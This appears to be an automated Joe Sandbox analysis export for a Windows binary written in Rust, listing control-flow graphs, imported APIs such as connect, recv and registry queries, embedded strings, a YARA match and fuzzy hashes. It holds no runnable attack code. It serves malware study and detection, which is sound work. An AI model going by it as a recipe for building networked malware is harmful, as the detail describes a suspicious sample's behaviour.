7ff71a7e3159-7ff71a7e3164 6376->6381 6382 7ff71a7e30ce-7ff71a7e3108 6376->6382 6380 7ff71a7e3037-7ff71a7e3071 6377->6380 6377->6381 6386 7ff71a7e3074-7ff71a7e3077 6380->6386 6388 7ff71a7e3166-7ff71a7e316a 6381->6388 6389 7ff71a7e31d5 6381->6389 6387 7ff71a7e310b-7ff71a7e310e 6382->6387 6395 7ff71a7e34df-7ff71a7e3591 memcpy call 7ff71a7e46fc 6385->6395 6396 7ff71a7e3482-7ff71a7e34c3 call 7ff71a7e3c68 6385->6396 6390 7ff71a7e316c-7ff71a7e3194 call 7ff71a7ca94f call 7ff71a820493 6386->6390 6391 7ff71a7e307d-7ff71a7e309b 6386->6391 6387->6390 6393 7ff71a7e3110-7ff71a7e312e 6387->6393 6392 7ff71a7e31d8-7ff71a7e3229 6388->6392 6389->6392 6433 7ff71a7e331c-7ff71a7e3378 call 7ff71a7cd833 6390->6433 6399 7ff71a7e30c0-7ff71a7e30c4 6391->6399 6400 7ff71a7e309d-7ff71a7e30bc 6391->6400 6401 7ff71a7e3231-7ff71a7e3234 6392->6401 6402 7ff71a7e3153-7ff71a7e3157 6393->6402 6403 7ff71a7e3130-7ff71a7e314f 6393->6403 6425 7ff71a7e2e8b-7ff71a7e2ec8 call 7ff71a7e3bcc call 7ff71a7e3c08 6394->6425 6426 7ff71a7e2e1e-7ff71a7e2e27 6394->6426 6412 7ff71a7e3593-7ff71a7e35b3 call 7ff71a7e4833 call 7ff71a84d572 6395->6412 6413 7ff71a7e35fe-7ff71a7e3627 6395->6413 6417 7ff71a7e34c8-7ff71a7e34cf 6396->6417 6399->6386 6400->6399 6408 7ff71a7e32c5-7ff71a7e3314 call 7ff71a820493 6401->6408 6409 7ff71a7e323a-7ff71a7e3263 6401->6409 6402->6387 6403->6402 6408->6433 6414 7ff71a7e3265 6409->6414 6415 7ff71a7e3268-7ff71a7e326f 6409->6415 6432 7ff71a7e37df-7ff71a7e37e3 6412->6432 6458 7ff71a7e35b9-7ff71a7e35c7 6412->6458 6424 7ff71a7e362f-7ff71a7e3660 6413->6424 6414->6415 6422 7ff71a7e3281-7ff71a7e32c0 6415->6422 6423 7ff71a7e3271-7ff71a7e3279 call 7ff71a7c74e1 6415->6423 6427 7ff71a7e34d5-7ff71a7e34da 6417->6427 6428 7ff71a7e35c9-7ff71a7e35f9 call 7ff71a7e46c7 6417->6428 6422->6401 6423->6422 6429 7ff71a7e3666-7ff71a7e3686 6424->6429 6430 7ff71a7e36ef-7ff71a7e3710 6424->6430 6459 7ff71a7e3975-7ff71a7e39ad call 7ff71a7e52cc 6425->6459 6460 7ff71a7e2ece-7ff71a7e2eea call 7ff71a7e3b70 6425->6460 6431 7ff71a7e37e5-7ff71a7e37f5 6426->6431 6427->6432 6450 7ff71a7e3887-7ff71a7e38a6 call 7ff71a820493 call 7ff71a7e4716 6428->6450 6429->6317 6447 7ff71a7e368c-7ff71a7e36a9 call 7ff71a7e46fc 6429->6447 6443 7ff71a7e376d 6430->6443 6431->6353 6432->6431 6456 7ff71a7e33d8-7ff71a7e33f3 call 7ff71a820493 6433->6456 6457 7ff71a7e337a-7ff71a7e33d6 call 7ff71a850505 call 7ff71a7cd833 memcpy 6433->6457 6446 7ff71a7e3772-7ff71a7e37a9 6443->6446 6452 7ff71a7e37ab-7ff71a7e37db call 7ff71a7e46fc 6446->6452 6453 7ff71a7e37fa-7ff71a7e3814 6446->6453 6469 7ff71a7e3712-7ff71a7e3743 6447->6469 6470 7ff71a7e36ab-7ff71a7e36d9 call 7ff71a7e4833 call 7ff71a7e46fc 6447->6470 6488 7ff71a7e38c8-7ff71a7e38f1 call 7ff71a84eabb 6450->6488 6489 7ff71a7e38a8-7ff71a7e38ad 6450->6489 6483 7ff71a7e3816-7ff71a7e3842 6452->6483 6484 7ff71a7e37dd 6452->6484 6465 7ff71a7e3850-7ff71a7e3882 call 7ff71a7d594b call 7ff71a7e46c7 * 2 call 7ff71a820493 6453->6465 6475 7ff71a7e33f8-7ff71a7e33fd 6456->6475 6457->6475 6458->6424 6491 7ff71a7e39af-7ff71a7e39c4 call 7ff71a7e5346 6459->6491 6492 7ff71a7e39c9-7ff71a7e3a45 call 7ff71a7d751e 6459->6492 6485 7ff71a7e2ef0-7ff71a7e2f0b call 7ff71a7e3c5d 6460->6485 6486 7ff71a7e396f-7ff71a7e3972 6460->6486 6465->6450 6469->6446 6509 7ff71a7e3745-7ff71a7e3765 6470->6509 6510 7ff71a7e36db-7ff71a7e36ea call 7ff71a7e4833 6470->6510 6475->6385 6483->6465 6495 7ff71a7e3844-7ff71a7e384b call 7ff71a7e4701 6483->6495 6484->6432 6485->6330 6486->6459 6504 7ff71a7e38f6-7ff71a7e38fe 6488->6504 6489->6330 6513 7ff71a7e3af0-7ff71a7e3b06 6491->6513 6522 7ff71a7e3a4d-7ff71a7e3a61 call 7ff71a7e52cc 6492->6522 6495->6465 6511 7ff71a7e3910-7ff71a7e391f call 7ff71a7d5994 6504->6511 6512 7ff71a7e3900-7ff71a7e390b call 7ff71a7c7818 6504->6512 6509->6443 6510->6432 6511->6343 6512->6511 6513->6371 6516 7ff71a7e3b0c-7ff71a7e3b13 6513->6516 6516->6371 6521 7ff71a7e3b19-7ff71a7e3b21 call 7ff71a820493 6516->6521 6521->6371 6528 7ff71a7e3a63-7ff71a7e3a68 6522->6528 6529 7ff71a7e3adb-7ff71a7e3aeb call 7ff71a7e5346 6522->6529 6530 7ff71a7e3a94-7ff71a7e3ad9 call 7ff71a859d7f 6528->6530 6531 7ff71a7e3a6a-7ff71a7e3a92 6528->6531 6529->6513 6530->6531 6531->6522
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true
                • Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd
                Similarity
                • API ID:
                • String ID: $dns error$invalid URL, scheme is not httpinvalid URL, scheme is missinginvalid URL, host is missingConnectError
                • API String ID: 0-1983688740
                • Opcode ID: 8e210988ce0f5fa5a0823b1a5b5ea6afc15ea0a0b88f9b4ea68c1aafdbd5ff0f
                • Instruction ID: 92569c8927d06d891e93615b5f4d1ff5b73b892f9346fcc6fad3aecb813139fa
                • Opcode Fuzzy Hash: 8e210988ce0f5fa5a0823b1a5b5ea6afc15ea0a0b88f9b4ea68c1aafdbd5ff0f
                • Instruction Fuzzy Hash: D9929F32A08FC584E761AF15E4413EAB3A4FB59B98F844132DE8D1779ADF38D299C710

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 7090 7ff71a7a1190-7ff71a7a11be 7091 7ff71a7a1470-7ff71a7a1473 GetStartupInfoA 7090->7091 7092 7ff71a7a11c4-7ff71a7a11e1 7090->7092 7094 7ff71a7a1480-7ff71a7a149a call 7ff71a85aa00 7091->7094 7093 7ff71a7a11f9-7ff71a7a1204 7092->7093 7095 7ff71a7a1206-7ff71a7a1214 7093->7095 7096 7ff71a7a11e8-7ff71a7a11eb 7093->7096 7097 7ff71a7a1427-7ff71a7a1436 call 7ff71a85aa08 7095->7097 7098 7ff71a7a121a-7ff71a7a121e 7095->7098 7100 7ff71a7a1410-7ff71a7a1421 7096->7100 7101 7ff71a7a11f1-7ff71a7a11f6 Sleep 7096->7101 7106 7ff71a7a1239-7ff71a7a123b 7097->7106 7107 7ff71a7a143c-7ff71a7a1457 _initterm 7097->7107 7102 7ff71a7a14a0-7ff71a7a14b9 call 7ff71a85a9f8 7098->7102 7103 7ff71a7a1224-7ff71a7a1233 7098->7103 7100->7097 7100->7098 7101->7093 7116 7ff71a7a14be-7ff71a7a14e1 call 7ff71a85a9e0 call 7ff71a7a1190 7102->7116 7103->7106 7103->7107 7110 7ff71a7a1241-7ff71a7a124e 7106->7110 7111 7ff71a7a145d-7ff71a7a1462 7106->7111 7107->7110 7107->7111 7113 7ff71a7a1250-7ff71a7a1258 7110->7113 7114 7ff71a7a125c-7ff71a7a12a4 call 7ff71a85afd0 SetUnhandledExceptionFilter call 7ff71a85aa30 call 7ff71a85ad30 call 7ff71a85aa40 7110->7114 7111->7110 7113->7114 7128 7ff71a7a12c2-7ff71a7a12c8 7114->7128 7129 7ff71a7a12a6 7114->7129 7124 7ff71a7a14e6-7ff71a7a14ec 7116->7124 7131 7ff71a7a12b0-7ff71a7a12b2 7128->7131 7132 7ff71a7a12ca-7ff71a7a12d8 7128->7132 7130 7ff71a7a1300-7ff71a7a1306 7129->7130 7136 7ff71a7a1308-7ff71a7a1312 7130->7136 7137 7ff71a7a131e-7ff71a7a1343 malloc 7130->7137 7133 7ff71a7a12b4-7ff71a7a12b7 7131->7133 7134 7ff71a7a12f9 7131->7134 7135 7ff71a7a12be 7132->7135 7138 7ff71a7a12e0-7ff71a7a12e2 7133->7138 7139 7ff71a7a12b9 7133->7139 7134->7130 7135->7128 7140 7ff71a7a1400-7ff71a7a1405 7136->7140 7141 7ff71a7a1318 7136->7141 7142 7ff71a7a1345-7ff71a7a134a 7137->7142 7143 7ff71a7a138b-7ff71a7a13bf call 7ff71a85ab20 call 7ff71a7a7040 7137->7143 7138->7134 7146 7ff71a7a12e4 7138->7146 7139->7135 7140->7141 7141->7137 7144 7ff71a7a1350-7ff71a7a1384 strlen malloc memcpy 7142->7144 7152 7ff71a7a13c4-7ff71a7a13d2 7143->7152 7144->7144 7147 7ff71a7a1386 7144->7147 7149 7ff71a7a12e8-7ff71a7a12f2 7146->7149 7147->7143 7149->7134 7151 7ff71a7a12f4-7ff71a7a12f7 7149->7151 7151->7134 7151->7149 7152->7116 7153 7ff71a7a13d8-7ff71a7a13e0 7152->7153 7153->7094 7154 7ff71a7a13e6-7ff71a7a13f5 7153->7154
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true
                • Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd
                Similarity
                • API ID: malloc$ExceptionFilterInfoSleepStartupUnhandledmemcpystrlen
                • String ID:
                • API String ID: 649803965-0
                • Opcode ID: 80d1d224de1a6640401435d731e26d080493a7775019c0812617ece2ba33a5da
                • Instruction ID: de76dc9dbf083829dc0716deb23d8e94edfead6fb632ba5ad2ff70bb1a78de26
                • Opcode Fuzzy Hash: 80d1d224de1a6640401435d731e26d080493a7775019c0812617ece2ba33a5da
                • Instruction Fuzzy Hash: 42815875E18B0691FB12BF15A4907B9E7A0AF49BA0FC840B7DD0D43395DE2CE96C8720
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true
                • Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd
                Similarity
                • API ID: connectmemcpy
                • String ID: called `Result::unwrap()` on an `Err` value
                • API String ID: 456332141-2333694755
                • Opcode ID: 65e8e5d18f29cf492085d96066f961543d32c184f994071bfc2f2299d1068bfd
                • Instruction ID: 3d24857dbfba9d9d38581391a2f68179409ed37e002f35152775db623701b4b3
                • Opcode Fuzzy Hash: 65e8e5d18f29cf492085d96066f961543d32c184f994071bfc2f2299d1068bfd
                • Instruction Fuzzy Hash: 54424C32A08BC681E7719F25E4403EAB3A4FB99754F808166DB8C47B56EF3CE199C750
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true
                • Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd
                Similarity
                • API ID: ErrorStatus
                • String ID: Out of bounds accesspolling StreamFuture twice/home/airevan/.cargo/registry/src/mirrors.ustc.edu.cn-4affec411d11e50f/futures-util-0.3.30/src/stream/stream/into_future.rs$called `Result::unwrap()` on an `Err` value
                • API String ID: 1596131371-362419011
                • Opcode ID: 1829bbf6aedae0a629c836ab05c507dfaee0e757e8c8a3793845133ae9de0390
                • Instruction ID: df601689fa5a0b812c051d4f462370f1e264314b1b169fc24b0d15de72daf08e
                • Opcode Fuzzy Hash: 1829bbf6aedae0a629c836ab05c507dfaee0e757e8c8a3793845133ae9de0390
                • Instruction Fuzzy Hash: 32D17E72A08E8681FA50EF15E4486BAB7A4FB887A0F844077DA9D43795DF3CE24DC710
                APIs
                Strings
                • filled overflowfilled must not become larger than initialized, xrefs: 00007FF71A84ED0D
                Memory Dump Source
                • Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true
                • Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd
                Similarity
                • API ID: ErrorLastrecv
                • String ID: filled overflowfilled must not become larger than initialized
                • API String ID: 2514157807-3814584485
                • Opcode ID: d08d5ecb5ad2450facc223ad0b58510cd64f2b9478f6b0b46bc67e3f6e2289f7
                • Instruction ID: 54549f7f6f272efeb4058013b71d24bf4154377de1b6a22808e32fb2f92ef15f
                • Opcode Fuzzy Hash: d08d5ecb5ad2450facc223ad0b58510cd64f2b9478f6b0b46bc67e3f6e2289f7
                • Instruction Fuzzy Hash: 9051E472A0CE4585FB21AB19E4407AAE761FB88BA8F944173EE9D037D5DE3CE459C310
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true
                • Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd
                Similarity
                • API ID: QueryValue
                • String ID: HTTP_PROXYhttp_proxyHTTPS_PROXYhttps_proxyALL_PROXYall_proxyREQUEST_METHODSoftware\Microsoft\Windows\CurrentVersion\Internet SettingsProxyEnableProxyServer=$httphttpswswssfile:///home/airevan/.cargo/registry/src/mirrors.ustc.edu.cn-4affec411d11e50f/url-2.5.0/src/parser.rs
                • API String ID: 3660427363-456205512
                • Opcode ID: f0bc1938e384b3d6c6cb0939c1b3d180dcc6a136b5b099a3b24ab9ef4b8d6c6c
                • Instruction ID: 602a89b828698cb124c7905c17ec193704e0099a97ca0093c7d525b5a9e09ad3
                • Opcode Fuzzy Hash: f0bc1938e384b3d6c6cb0939c1b3d180dcc6a136b5b099a3b24ab9ef4b8d6c6c
                • Instruction Fuzzy Hash: 77628222A0CE8685FB22AB15E4413FAE361FB847A4F844176DE8D07B95DF7CE169C710
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.2905472003.000001912B770000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001912B770000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1912b770000_31#U544a.jbxd
                Yara matches
                Similarity
                • API ID: NameUser_snprintfmallocstrrchr
                • String ID:
                • API String ID: 1238167203-0
                • Opcode ID: 3fcc9734dfb008eb330924bec949316915ae8132a5d43751b4f12920707a76c7
                • Instruction ID: 2b5619cfcc6674701dfe4688014ce91c0656a71e885a1ae2b0e2cd5003d592be
                • Opcode Fuzzy Hash: 3fcc9734dfb008eb330924bec949316915ae8132a5d43751b4f12920707a76c7
                • Instruction Fuzzy Hash: 97518470758A091FEB58BB68A4667E972D2F7CE310F20452EA18EC32E3DE24D8439745
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true
                • Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd
                Similarity
                • API ID: ErrorStatus
                • String ID:
                • API String ID: 1596131371-0
                • Opcode ID: 05e3aa1f477d5b3e428a0d47a6077f38ab312bb730ff683002967aac5b469b3d
                • Instruction ID: 58d82bfe70969d66d69bba8a3af22b9d6917b22ba89f7bc8de8c57b592d29f67
                • Opcode Fuzzy Hash: 05e3aa1f477d5b3e428a0d47a6077f38ab312bb730ff683002967aac5b469b3d
                • Instruction Fuzzy Hash: AA419D32A08F4186FB10AF51E0413A9E3A4FB88BB0F844172DA8D47B86DF7CE569C710
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true
                • Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd
                Similarity
                • API ID:
                • String ID: Microsoft Unified Security Protocol Provider
                • API String ID: 0-238809041
                • Opcode ID: 76d1b550ed0c15f42858f841513e10c3d785c80694a0528341cce17052c7faf9
                • Instruction ID: d9713263e3707c7dbb36e15ba366a58bef93a18c1af26874476cd6aa1aed8c0d
                • Opcode Fuzzy Hash: 76d1b550ed0c15f42858f841513e10c3d785c80694a0528341cce17052c7faf9
                • Instruction Fuzzy Hash: 6F51F522A18BC186FB61CB15E4003AAE7A1FB99B94F948137DE8C17794DF3DD49AC700
                Memory Dump Source
                • Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true
                • Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: e94cbdac3f3af83b3aa98e4f55e03feac2159b6e1584c848038b7c6732948f0e
                • Instruction ID: 5ca70c7fe950695f9b5ad19a935d451355cdfca70674e2a12da7796a5f7681da
                • Opcode Fuzzy Hash: e94cbdac3f3af83b3aa98e4f55e03feac2159b6e1584c848038b7c6732948f0e
                • Instruction Fuzzy Hash: B3C08C00F2A482C2FA5836235C823B8A0B02B0E3A0FC400B2C908C1282DE0CADFF4B20

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 1426 7ff71a7e1777-7ff71a7e1804 1569 7ff71a7e1807 call 7ff71a7e31c4 1426->1569 1570 7ff71a7e1807 call 7ff71a7e2c14 1426->1570 1571 7ff71a7e1807 call 7ff71a7e2bc6 1426->1571 1572 7ff71a7e1807 call 7ff71a7e2b8c 1426->1572 1573 7ff71a7e1807 call 7ff71a7e29fc 1426->1573 1574 7ff71a7e1807 call 7ff71a7e2a5e 1426->1574 1575 7ff71a7e1807 call 7ff71a7e2c2a 1426->1575 1576 7ff71a7e1807 call 7ff71a7e3199 1426->1576 1428 7ff71a7e180a-7ff71a7e1811 1429 7ff71a7e1813-7ff71a7e181c 1428->1429 1430 7ff71a7e1821-7ff71a7e1851 call 7ff71a7e279c 1428->1430 1431 7ff71a7e2738-7ff71a7e2759 1429->1431 1434 7ff71a7e1853-7ff71a7e1880 call 7ff71a7d542d 1430->1434 1435 7ff71a7e1885-7ff71a7e1888 1430->1435 1439 7ff71a7e2506 1434->1439 1436 7ff71a7e1b96-7ff71a7e1ba1 1435->1436 1437 7ff71a7e188e-7ff71a7e1892 1435->1437 1436->1439 1440 7ff71a7e1c5e-7ff71a7e1c63 1437->1440 1441 7ff71a7e1898-7ff71a7e19fa memcpy 1437->1441 1444 7ff71a7e2563-7ff71a7e25e7 call 7ff71a7da70d call 7ff71a7d4d17 memcpy 1439->1444 1440->1444 1445 7ff71a7e2766-7ff71a7e2774 1441->1445 1446 7ff71a7e1a00-7ff71a7e1a79 call 7ff71a7d43fd call 7ff71a81faaf 1441->1446 1444->1431 1448 7ff71a7e2790-7ff71a7e279a call 7ff71a7aef70 1445->1448 1458 7ff71a7e1a94-7ff71a7e1aae call 7ff71a81fb52 1446->1458 1459 7ff71a7e1a7b-7ff71a7e1a8f call 7ff71a81f9a3 call 7ff71a81fb1a 1446->1459 1464 7ff71a7e1ab0-7ff71a7e1add call 7ff71a7e0c1b call 7ff71a7dd08a memcpy 1458->1464 1465 7ff71a7e1b0a-7ff71a7e1b6d call 7ff71a81f9f2 call 7ff71a81fed8 call 7ff71a81fd68 1458->1465 1459->1458 1475 7ff71a7e1ae2-7ff71a7e1b05 memcpy 1464->1475 1480 7ff71a7e1ba6-7ff71a7e1bab 1465->1480 1481 7ff71a7e1b6f-7ff71a7e1b94 call 7ff71a7d542d 1465->1481 1477 7ff71a7e20b3-7ff71a7e213f memcpy call 7ff71a7e27d8 1475->1477 1489 7ff71a7e2234-7ff71a7e22c1 memcpy 1477->1489 1490 7ff71a7e2145-7ff71a7e214f 1477->1490 1482 7ff71a7e1bfb-7ff71a7e1c39 1480->1482 1483 7ff71a7e1bad-7ff71a7e1bdb call 7ff71a81f9f2 call 7ff71a7d542d 1480->1483 1492 7ff71a7e1be2-7ff71a7e1bf6 call 7ff71a84962b 1481->1492 1487 7ff71a7e1c45-7ff71a7e1c52 1482->1487 1488 7ff71a7e1c3b-7ff71a7e1c43 1482->1488 1483->1492 1497 7ff71a7e1c54-7ff71a7e1c5c 1487->1497 1498 7ff71a7e1c68 1487->1498 1496 7ff71a7e1c6b-7ff71a7e1c86 call 7ff71a8200db 1488->1496 1494 7ff71a7e2472-7ff71a7e24ed call 7ff71a7e27f2 memcpy call 7ff71a7e2843 1489->1494 1495 7ff71a7e22c7 1489->1495 1499 7ff71a7e2155-7ff71a7e217e memcpy 1490->1499 1500 7ff71a7e22cc-7ff71a7e22d4 1490->1500 1492->1482 1523 7ff71a7e24ef-7ff71a7e2501 call 7ff71a7d7664 1494->1523 1524 7ff71a7e2508-7ff71a7e255b memcpy 1494->1524 1503 7ff71a7e2727-7ff71a7e2736 1495->1503 1515 7ff71a7e1ce2-7ff71a7e1d73 call 7ff71a7e0cdd call 7ff71a7e0cff call 7ff71a7f7d4f 1496->1515 1516 7ff71a7e1c88-7ff71a7e1cdd call 7ff71a7dd08a call 7ff71a7dcfb6 1496->1516 1497->1496 1498->1496 1507 7ff71a7e2184-7ff71a7e2205 memcpy call 7ff71a7e2866 1499->1507 1508 7ff71a7e2782-7ff71a7e2789 1499->1508 1504 7ff71a7e2467-7ff71a7e2470 1500->1504 1503->1431 1504->1494 1514 7ff71a7e220a-7ff71a7e2215 1507->1514 1508->1448 1518 7ff71a7e221b-7ff71a7e221f 1514->1518 1519 7ff71a7e22d9-7ff71a7e23fc memcpy * 3 1514->1519 1546 7ff71a7e1d75-7ff71a7e1da7 call 7ff71a7d4c7a call 7ff71a85a094 1515->1546 1547 7ff71a7e1dae-7ff71a7e1db1 1515->1547 1540 7ff71a7e1efe-7ff71a7e1f02 1516->1540 1525 7ff71a7e2225-7ff71a7e222f 1518->1525 1526 7ff71a7e25ec-7ff71a7e271b memcpy * 2 call 7ff71a7e27e8 memcpy 1518->1526 1528 7ff71a7e271f-7ff71a7e2724 1519->1528 1529 7ff71a7e2402-7ff71a7e2462 memcpy call 7ff71a7e27e8 1519->1529 1523->1439 1524->1444 1525->1529 1526->1528 1528->1503 1529->1504 1543 7ff71a7e1f04-7ff71a7e1f1a memcpy 1540->1543 1544 7ff71a7e1f1f-7ff71a7e1f3a memcpy 1540->1544 1543->1544 1545 7ff71a7e1f5c-7ff71a7e1f95 call 7ff71a7e0ca2 call 7ff71a7e0c1b memcpy 1544->1545 1562 7ff71a7e2041-7ff71a7e20b1 memcpy * 2 1545->1562 1563 7ff71a7e1f9b-7ff71a7e1f9f 1545->1563 1560 7ff71a7e1dbc-7ff71a7e1dc4 1546->1560 1561 7ff71a7e1da9-7ff71a7e1dac 1546->1561 1550 7ff71a7e1db7-7ff71a7e1dba 1547->1550 1553 7ff71a7e1dcc-7ff71a7e1ee3 call 7ff71a7e0d67 call 7ff71a7e2866 1550->1553 1566 7ff71a7e1ee8-7ff71a7e1ef7 1553->1566 1560->1553 1561->1550 1562->1477 1563->1475 1565 7ff71a7e1fa5-7ff71a7e203f memcpy * 3 1563->1565 1565->1477 1567 7ff71a7e1f3c-7ff71a7e1f57 memcpy 1566->1567 1568 7ff71a7e1ef9 1566->1568 1567->1545 1568->1540 1569->1428 1570->1428 1571->1428 1572->1428 1573->1428 1574->1428 1575->1428 1576->1428
                APIs
                Strings
                • future polled after completion/home/airevan/.cargo/registry/src/mirrors.ustc.edu.cn-4affec411d11e50f/tokio-native-tls-0.3.1/src/lib.rs, xrefs: 00007FF71A7E2766, 00007FF71A7E2782
                Memory Dump Source
                • Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true
                • Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd
                Similarity
                • API ID: memcpy
                • String ID: future polled after completion/home/airevan/.cargo/registry/src/mirrors.ustc.edu.cn-4affec411d11e50f/tokio-native-tls-0.3.1/src/lib.rs
                • API String ID: 3510742995-3485458656
                • Opcode ID: 03d25209b632549addd38d1fea2685cf485516300824df6382c71af748816794
                • Instruction ID: 78a314dfa5728f4c8bf41a6d22d3476405a1522798d5e58dc62b2f0288f39835
                • Opcode Fuzzy Hash: 03d25209b632549addd38d1fea2685cf485516300824df6382c71af748816794
